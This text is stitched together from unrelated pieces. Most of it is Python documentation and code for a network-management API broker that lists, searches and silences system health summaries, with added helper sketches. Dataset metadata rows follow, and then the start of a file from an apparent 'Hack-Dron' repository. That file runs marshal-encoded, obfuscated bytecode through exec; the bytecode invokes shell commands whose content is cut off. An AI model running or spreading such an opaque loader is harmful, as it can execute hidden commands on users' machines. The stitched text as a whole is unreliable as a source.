:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each SystemHealthSummary. Valid values are id, datasource_id, timestamp, category, diagnostic, status, entry_type, visibility, message_code, message, silenceable_ind, silenced_ind, updated_at, subcategory. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return system_health_summaries: An array of the SystemHealthSummary objects that match the specified input criteria.
:rtype system_health_summaries: Array of SystemHealthSummary
"""
return self.api_list_request(self._get_method_fullname("index"), kwargs)
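# Editor's sketch: the start/limit inputs documented above implement
# offset pagination (e.g. start=10, limit=10 returns records 10-19).
# A hypothetical generator that walks every page via index(), assuming
# each call returns a plain list of records:
def iter_system_health_summaries(broker, page_size=1000):
    """Yield every SystemHealthSummary by paging through broker.index()."""
    start = 0
    while True:
        page = broker.index(start=start, limit=page_size, sort=["id"], dir=["asc"])
        if not page:
            break
        for record in page:
            yield record
        if len(page) < page_size:
            # Short page means we have reached the last records.
            break
        start += page_size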
def search(self, **kwargs):
"""Lists the available system health summaries matching the input criteria. This method provides a more flexible search interface than the index method, but searching using this method is more demanding on the system and will not perform to the same level as the index method. The input fields listed below will be used as in the index method, to filter the result, along with the optional query string and XML filter described below.
**Inputs**
| ``api version min:`` 2.9
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param category: No description is available for category.
:type category: Array of String
| ``api version min:`` 2.9
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param datasource_id: No description is available for datasource_id.
:type datasource_id: Array of String
| ``api version min:`` 2.9
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param diagnostic: No description is available for diagnostic.
:type diagnostic: Array of String
| ``api version min:`` 2.9
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param entry_type: No description is available for entry_type.
:type entry_type: Array of String
| ``api version min:`` 2.9
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param id: No description is available for id.
:type id: Array of String
| ``api version min:`` 2.9
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param message: No description is available for message.
:type message: Array of String
| ``api version min:`` 2.9
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param message_code: No description is available for message_code.
:type message_code: Array of String
| ``api version min:`` 2.9
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param silenceable_ind: No description is available for silenceable_ind.
:type silenceable_ind: Array of String
| ``api version min:`` 2.9
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param silenced_ind: No description is available for silenced_ind.
:type silenced_ind: Array of String
| ``api version min:`` 2.9
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param status: No description is available for status.
:type status: Array of String
| ``api version min:`` 2.9
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param subcategory: No description is available for subcategory.
:type subcategory: Array of String
| ``api version min:`` 2.9
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param timestamp: No description is available for timestamp.
:type timestamp: Array of String
| ``api version min:`` 2.9
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param updated_at: No description is available for updated_at.
:type updated_at: Array of String
| ``api version min:`` 2.9
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param visibility: No description is available for visibility.
:type visibility: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of system health summary methods. The listed methods will be called on each system health summary returned and included in the output. Available methods are: data_source.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: data_source.
:type include: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit parameter for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` id
:param sort: The data field(s) to use for sorting the output. Default is id. Valid values are id, datasource_id, timestamp, category, diagnostic, status, entry_type, visibility, message_code, message, silenceable_ind, silenced_ind, updated_at, subcategory.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each SystemHealthSummary. Valid values are id, datasource_id, timestamp, category, diagnostic, status, entry_type, visibility, message_code, message, silenceable_ind, silenced_ind, updated_at, subcategory. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param query: This value will be matched against system health summaries, looking to see if one or more of the listed attributes contain the passed value. You may also surround the value with '/' and '/' to perform a regular expression search rather than a containment operation. Any record that matches will be returned. The attributes searched are: category, datasource_id, diagnostic, entry_type, id, message, message_code, silenceable_ind, silenced_ind, status, subcategory, timestamp, updated_at, visibility.
:type query: String
| ``api version min:`` 2.3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param xml_filter: A SetFilter XML structure to further refine the search. The SetFilter will be applied AFTER any search query or field values, but before any limit options. The limit and pagination will be enforced after the filter. Note that this kind of filter may be costly and inefficient if it is not combined with database-level filtering.
:type xml_filter: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return system_health_summaries: An array of the SystemHealthSummary objects that match the specified input criteria.
:rtype system_health_summaries: Array of SystemHealthSummary
"""
return self.api_list_request(self._get_method_fullname("search"), kwargs)
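# Editor's sketch of the `query` input documented above: a plain string
# performs containment matching, while wrapping it in slashes switches
# to a regular-expression search. The helper name is hypothetical:
def search_summaries(broker, pattern, regex=False):
    """Search system health summaries by free-text or regex pattern."""
    query = "/%s/" % pattern if regex else pattern
    return broker.search(query=query, sort=["timestamp"], dir=["desc"])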
def find(self, **kwargs):
"""Lists the available system health summaries matching the input specification. This provides the most flexible search specification of all the query mechanisms, enabling searching using comparison operations other than equality. However, it is more complex to use and will not perform as efficiently as the index or search methods. In the input descriptions below, 'field names' refers to the following fields: category, datasource_id, diagnostic, entry_type, id, message, message_code, silenceable_ind, silenced_ind, status, subcategory, timestamp, updated_at, visibility.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_category: The operator to apply to the field category. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. category: No description is available for category. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_category: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_category: If op_category is specified, the field named in this input will be compared to the value in category using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_category must be specified if op_category is specified.
:type val_f_category: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_category: If op_category is specified, this value will be compared to the value in category using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_category must be specified if op_category is specified.
:type val_c_category: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_datasource_id: The operator to apply to the field datasource_id. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. datasource_id: No description is available for datasource_id. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_datasource_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_datasource_id: If op_datasource_id is specified, the field named in this input will be compared to the value in datasource_id using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_datasource_id must be specified if op_datasource_id is specified.
:type val_f_datasource_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_datasource_id: If op_datasource_id is specified, this value will be compared to the value in datasource_id using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_datasource_id must be specified if op_datasource_id is specified.
:type val_c_datasource_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_diagnostic: The operator to apply to the field diagnostic. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. diagnostic: No description is available for diagnostic. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_diagnostic: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_diagnostic: If op_diagnostic is specified, the field named in this input will be compared to the value in diagnostic using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_diagnostic must be specified if op_diagnostic is specified.
:type val_f_diagnostic: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_diagnostic: If op_diagnostic is specified, this value will be compared to the value in diagnostic using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_diagnostic must be specified if op_diagnostic is specified.
:type val_c_diagnostic: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_entry_type: The operator to apply to the field entry_type. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. entry_type: No description is available for entry_type. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_entry_type: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_entry_type: If op_entry_type is specified, the field named in this input will be compared to the value in entry_type using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_entry_type must be specified if op_entry_type is specified.
:type val_f_entry_type: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_entry_type: If op_entry_type is specified, this value will be compared to the value in entry_type using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_entry_type must be specified if op_entry_type is specified.
:type val_c_entry_type: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_id: The operator to apply to the field id. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. id: No description is available for id. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_id: If op_id is specified, the field named in this input will be compared to the value in id using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_id must be specified if op_id is specified.
:type val_f_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_id: If op_id is specified, this value will be compared to the value in id using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_id must be specified if op_id is specified.
:type val_c_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_message: The operator to apply to the field message. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. message: No description is available for message. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_message: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_message: If op_message is specified, the field named in this input will be compared to the value in message using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_message must be specified if op_message is specified.
:type val_f_message: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_message: If op_message is specified, this value will be compared to the value in message using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_message must be specified if op_message is specified.
:type val_c_message: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_message_code: The operator to apply to the field message_code. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. message_code: No description is available for message_code. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_message_code: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_message_code: If op_message_code is specified, the field named in this input will be compared to the value in message_code using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_message_code must be specified if op_message_code is specified.
:type val_f_message_code: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_message_code: If op_message_code is specified, this value will be compared to the value in message_code using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_message_code must be specified if op_message_code is specified.
:type val_c_message_code: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_silenceable_ind: The operator to apply to the field silenceable_ind. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. silenceable_ind: No description is available for silenceable_ind. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_silenceable_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_silenceable_ind: If op_silenceable_ind is specified, the field named in this input will be compared to the value in silenceable_ind using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_silenceable_ind must be specified if op_silenceable_ind is specified.
:type val_f_silenceable_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_silenceable_ind: If op_silenceable_ind is specified, this value will be compared to the value in silenceable_ind using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_silenceable_ind must be specified if op_silenceable_ind is specified.
:type val_c_silenceable_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_silenced_ind: The operator to apply to the field silenced_ind. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. silenced_ind: No description is available for silenced_ind. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_silenced_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_silenced_ind: If op_silenced_ind is specified, the field named in this input will be compared to the value in silenced_ind using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_silenced_ind must be specified if op_silenced_ind is specified.
:type val_f_silenced_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_silenced_ind: If op_silenced_ind is specified, this value will be compared to the value in silenced_ind using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_silenced_ind must be specified if op_silenced_ind is specified.
:type val_c_silenced_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_status: The operator to apply to the field status. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. status: No description is available for status. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_status: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_status: If op_status is specified, the field named in this input will be compared to the value in status using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_status must be specified if op_status is specified.
:type val_f_status: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_status: If op_status is specified, this value will be compared to the value in status using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_status must be specified if op_status is specified.
:type val_c_status: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_subcategory: The operator to apply to the field subcategory. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. subcategory: No description is available for subcategory. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_subcategory: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_subcategory: If op_subcategory is specified, the field named in this input will be compared to the value in subcategory using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_subcategory must be specified if op_subcategory is specified.
:type val_f_subcategory: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_subcategory: If op_subcategory is specified, this value will be compared to the value in subcategory using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_subcategory must be specified if op_subcategory is specified.
:type val_c_subcategory: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_timestamp: The operator to apply to the field timestamp. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. timestamp: No description is available for timestamp. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_timestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_timestamp: If op_timestamp is specified, the field named in this input will be compared to the value in timestamp using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_timestamp must be specified if op_timestamp is specified.
:type val_f_timestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_timestamp: If op_timestamp is specified, this value will be compared to the value in timestamp using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_timestamp must be specified if op_timestamp is specified.
:type val_c_timestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_updated_at: The operator to apply to the field updated_at. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. updated_at: No description is available for updated_at. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_updated_at: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_updated_at: If op_updated_at is specified, the field named in this input will be compared to the value in updated_at using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_updated_at must be specified if op_updated_at is specified.
:type val_f_updated_at: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_updated_at: If op_updated_at is specified, this value will be compared to the value in updated_at using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_updated_at must be specified if op_updated_at is specified.
:type val_c_updated_at: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_visibility: The operator to apply to the field visibility. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. visibility: No description is available for visibility. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_visibility: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_visibility: If op_visibility is specified, the field named in this input will be compared to the value in visibility using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_visibility must be specified if op_visibility is specified.
:type val_f_visibility: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_visibility: If op_visibility is specified, this value will be compared to the value in visibility using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_visibility must be specified if op_visibility is specified.
:type val_c_visibility: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of system health summary methods. The listed methods will be called on each system health summary returned and included in the output. Available methods are: data_source.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: data_source.
:type include: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit parameter for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` id
:param sort: The data field(s) to use for sorting the output. Default is id. Valid values are id, datasource_id, timestamp, category, diagnostic, status, entry_type, visibility, message_code, message, silenceable_ind, silenced_ind, updated_at, subcategory.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each SystemHealthSummary. Valid values are id, datasource_id, timestamp, category, diagnostic, status, entry_type, visibility, message_code, message, silenceable_ind, silenced_ind, updated_at, subcategory. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
| ``api version min:`` 2.3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param xml_filter: A SetFilter XML structure to further refine the search. The SetFilter will be applied AFTER any search query or field values, but before any limit options. The limit and pagination will be enforced after the filter. Note that this kind of filter may be costly and inefficient if it is not combined with database-level filtering.
:type xml_filter: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return system_health_summaries: An array of the SystemHealthSummary objects that match the specified input criteria.
:rtype system_health_summaries: Array of SystemHealthSummary
"""
return self.api_list_request(self._get_method_fullname("find"), kwargs)
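# Editor's sketch of the op_/val_c_ triplets documented above, which
# express comparisons other than equality. The chosen field values are
# illustrative assumptions, not documented constants:
def find_recent_unsilenced(broker, since):
    """Find summaries newer than `since` that have not been silenced."""
    return broker.find(
        op_timestamp=">=", val_c_timestamp=since,
        op_silenced_ind="=", val_c_silenced_ind="0",
        sort=["timestamp"], dir=["desc"],
    )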
def tree(self, **kwargs):
"""Get tree of health statuses
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param query: Search string
:type query: String
**Outputs**
"""
return self.api_request(self._get_method_fullname("tree"), kwargs)
def storage_data(self, **kwargs):
"""Available disk space data for 2 last weeks
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param datasource_id: Datasource ID
:type datasource_id: Integer
**Outputs**
"""
return self.api_request(self._get_method_fullname("storage_data"), kwargs)
def silence(self, **kwargs):
"""Silence/Unsilence warnings
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param id: The ID of the warning to silence or unsilence.
:type id: Integer
**Outputs**
"""
return self.api_request(self._get_method_fullname("silence"), kwargs)
def overall_system_health(self, **kwargs):
"""Delivers a one-line summary of system health.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` False
:param include_silenced_ind: Indicates whether to include IDs that have been silenced by the user.
:type include_silenced_ind: Boolean
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` False
:param include_closed_ind: Indicates whether to include IDs that have been hidden for the user's session.
:type include_closed_ind: Boolean
**Outputs**
"""
return self.api_request(self._get_method_fullname("overall_system_health"), kwargs)
def hide_overall_system_health_bar(self, **kwargs):
"""Hides the system health status bar for the current unhealthy IDs.
**Inputs**
**Outputs**
"""
return self.api_request(self._get_method_fullname("hide_overall_system_health_bar"), kwargs)
def license_issue_summary(self, **kwargs):
"""Delivers a one-line summary of platform limit issues.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` False
:param include_closed_ind: Indicates whether to include IDs that have been hidden for the user's session.
:type include_closed_ind: Boolean
**Outputs**
"""
return self.api_request(self._get_method_fullname("license_issue_summary"), kwargs)
def hide_license_issue_bar(self, **kwargs):
"""Hides the platform limit issue bar for the current issue IDs.
**Inputs**
**Outputs**
"""
return self.api_request(self._get_method_fullname("hide_license_issue_bar"), kwargs)
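# Editor's note: hypothetical end-to-end wiring for the broker above.
# It is assumed (not shown in this file) that the infoblox_netmri
# client hands out brokers via get_broker():
def print_overall_health(client):
    broker = client.get_broker("SystemHealthSummary")
    # One-line health summary, excluding warnings the user has silenced.
    print(broker.overall_system_health(include_silenced_ind=False))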
| 50.24609
| 583
| 0.605446
| 6,112
| 48,186
| 4.683246
| 0.048429
| 0.069871
| 0.045416
| 0.059391
| 0.920661
| 0.915665
| 0.904835
| 0.874755
| 0.852641
| 0.830108
| 0
| 0.003315
| 0.311273
| 48,186
| 959
| 584
| 50.24609
| 0.859192
| 0.800627
| 0
| 0
| 0
| 0
| 0.082213
| 0.060496
| 0
| 0
| 0
| 0
| 0
| 1
| 0.44
| false
| 0
| 0.04
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 9
| ed18544b2f1154a7bae4ed059c4d50c70a394f72
| 5,433
| py
| Python
| Data/Control.py
| menang22/Hack-Dron
| f0465d1a967a12225dd60a3825f318dcbbf653a5
| ["MIT"] | 2
| 2021-03-01T18:29:10.000Z
| 2021-03-01T18:34:25.000Z
| Data/Control.py
| menang22/Hack-Dron
| f0465d1a967a12225dd60a3825f318dcbbf653a5
| ["MIT"] | null | null | null
| Data/Control.py
| menang22/Hack-Dron
| f0465d1a967a12225dd60a3825f318dcbbf653a5
| ["MIT"] | null | null | null
|
#!/python3
# encrypted by WGIS
import marshal
exec(marshal.loads('''c\x00\x00\x00\x00\x00\x00\x00\x00\x1f\x00\x00\x00@\x00\x00\x00s\xb4\x03\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x02\x00Z\x02\x00d\x03\x00Z\x03\x00d\x04\x00Z\x04\x00d\x05\x00Z\x05\x00d\x06\x00e\x02\x00e\x03\x00f\x02\x00\x16GHd\x07\x00e\x04\x00e\x02\x00e\x04\x00e\x02\x00e\x04\x00e\x03\x00f\x06\x00\x16GHd\x08\x00e\x04\x00e\x02\x00e\x04\x00e\x02\x00e\x04\x00e\x03\x00f\x06\x00\x16GHd\t\x00e\x04\x00e\x02\x00e\x04\x00e\x02\x00e\x04\x00e\x03\x00f\x06\x00\x16GHd\x06\x00e\x02\x00e\x03\x00f\x02\x00\x16GHHe\x06\x00d\n\x00e\x04\x00e\x02\x00e\x04\x00e\x02\x00e\x04\x00e\x02\x00e\x05\x00e\x04\x00e\x02\x00e\x04\x00e\x02\x00e\x05\x00e\x04\x00e\x02\x00e\x04\x00e\x02\x00e\x05\x00e\x04\x00e\x02\x00e\x04\x00e\x02\x00e\x05\x00e\x04\x00e\x02\x00e\x04\x00e\x02\x00e\x05\x00e\x02\x00e\x04\x00f\x1d\x00\x16\x83\x01\x00Z\x07\x00e\x07\x00d\x0b\x00k\x02\x00s\x1f\x01e\x07\x00d\x0c\x00k\x02\x00r|\x01d\r\x00e\x04\x00e\x02\x00e\x04\x00e\x05\x00e\x02\x00e\x03\x00f\x06\x00\x16GHe\x00\x00j\x08\x00d\x0e\x00\x83\x01\x00\x01e\x00\x00j\x08\x00d\x0f\x00\x83\x01\x00\x01d\x10\x00e\x04\x00e\x02\x00e\x04\x00e\x05\x00e\x02\x00e\x03\x00f\x06\x00\x16GHe\x01\x00j\t\x00\x83\x00\x00\x01n4\x02e\x07\x00d\x11\x00k\x02\x00s\x94\x01e\x07\x00d\x12\x00k\x02\x00r\xf1\x01d\r\x00e\x04\x00e\x02\x00e\x04\x00e\x05\x00e\x02\x00e\x03\x00f\x06\x00\x16GHe\x00\x00j\x08\x00d\x13\x00\x83\x01\x00\x01e\x00\x00j\x08\x00d\x14\x00\x83\x01\x00\x01d\x10\x00e\x04\x00e\x02\x00e\x04\x00e\x05\x00e\x02\x00e\x03\x00f\x06\x00\x16GHe\x01\x00j\t\x00\x83\x00\x00\x01n\xbf\x01e\x07\x00d\x15\x00k\x02\x00s\t\x02e\x07\x00d\x16\x00k\x02\x00rf\x02d\r\x00e\x04\x00e\x02\x00e\x04\x00e\x05\x00e\x02\x00e\x03\x00f\x06\x00\x16GHe\x00\x00j\x08\x00d\x17\x0